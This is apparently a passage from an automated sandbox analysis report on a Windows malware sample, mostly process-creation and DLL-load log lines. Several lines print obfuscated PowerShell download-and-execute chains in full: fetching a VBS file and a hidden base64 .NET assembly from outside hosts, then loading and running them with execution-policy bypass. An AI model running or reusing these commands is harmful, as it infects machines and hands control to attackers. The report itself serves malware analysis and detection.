seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"Jump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES845C.tmp" "c:\Users\user\AppData\Local\Temp\mffkkngw\CSC9E50345C585C4EFF867E1FFD2050D1A6.TMP"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
          Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\vtjrhji C:\Users\user\AppData\Roaming\vtjrhji
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
